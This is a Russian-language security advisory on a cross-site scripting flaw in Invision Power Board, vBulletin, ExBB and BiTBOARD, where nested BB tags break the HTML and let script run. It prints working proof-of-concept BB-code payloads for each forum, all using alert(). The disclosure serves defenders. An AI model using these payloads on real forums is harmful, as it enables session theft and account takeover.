• Партнер

  • Программа: Invision Power Board 2.0.0 и более ранние версии, vBulletin v3.* и другие, ExBB 1.9.1,
    BiTBOARD 2.5 и более ранние версии и другие 

    Уязвимость позволяет злоумышленнику выполнить XSS атаку и получить доступ к важным данным пользователей. 
    Уязвимость существует из-за некорректной обработки параметров "спаренных тегов" в теле сообщения. Злоумышленник может выполнить произвольный javascript сценарий в браузере целевого пользователя и потенциально получить административный доступ к системе.
    Уязвимость проявляется при вставке одного BB тега, в качестве аргумента другого BB тега (спаренные теги). При этом, оба тега парсятся в соответствующие HTML теги, но поскольку один из них оказывается внутри атрибутов другого, то структура HTML нарушается. Нарушение структуры может быть использовано для вставки произвольного скрипта. Пример:

    Invision Power Board:

    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:alert()) [/COLOR]

    vBulletin:

    [EMAIL=[URL=s as=`s@wew.ew]mailto:assss@wew.ew] sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip
    t:alert(/Hi_from_Algol/))`

    ExBB:

    [color='[url]http://rerer.rew[/url]]fffff[/color]'  style=background:url(javascript:alert());

    BiTBOARD:

    [img]path/to/some/image' onMouseover='alert("hehehe... insecure");[/img]

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии